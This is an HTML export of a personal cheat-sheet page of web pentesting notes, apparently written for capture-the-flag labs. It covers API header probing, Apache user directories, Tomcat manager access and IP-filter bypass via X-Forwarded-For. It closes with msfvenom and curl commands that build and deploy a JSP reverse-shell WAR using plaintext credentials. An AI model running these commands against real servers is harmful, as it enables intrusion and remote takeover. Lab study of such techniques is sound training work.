<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../style.css">
    <base target="_parent">
    <title data-trilium-title>Web</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Web</h1>

      <div class="ck-content">
        <p>ALWAYS LOOK FOR AN <code>API</code>, after finding an api use <code>curl -vv</code> to
          look closely at the headers</p>
        <p>Apache has a setting where it includes home directories in it’s file system,
          accessible through ~/[Name of User].</p>
        <p><code>http://&lt;IP&gt;/~files/pass.txt</code>

        </p>
        <p>If apache tomcat creds are found but <code>/manager</code> access is disabled(only
          available for localhost on victim), you can try to look for cli access
          available at <code>/manager/text</code> </p>
        <p>If the webserver is filtering based on your ip, we can use the <code>X-Forwarded-For: &lt;ip&gt;</code> or <code>x-9ad42dea0356cb04: &lt;ip&gt;</code> headers
          with a custom ip.</p>
        <p>To manually use the start button, use: <a href="https://stackoverflow.com/questions/13831601/disabling-and-enabling-a-html-input-button">https://stackoverflow.com/questions/13831601/disabling-and-enabling-a-html-input-button</a> </p>
        <p><code>whatweb</code> is able identify the exact version:</p><pre><code class="language-text-plain">whatweb http://maintest.enterprize.thm --plugins typo3 --aggression 3</code></pre>

        <p><code>generate a war shell and upload (upload files with curl):</code>

        </p><pre><code class="language-text-plain">msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.17.11 LPORT=1234 -f war -o revshell.war

curl -u 'webdev:Hgj3LA$02D$Fa@21' --upload-file rshell.war http://10.10.144.71:8080/manager/text/deploy?path=/revshell</code></pre>
      </div>
    </div>
  </body>

</html>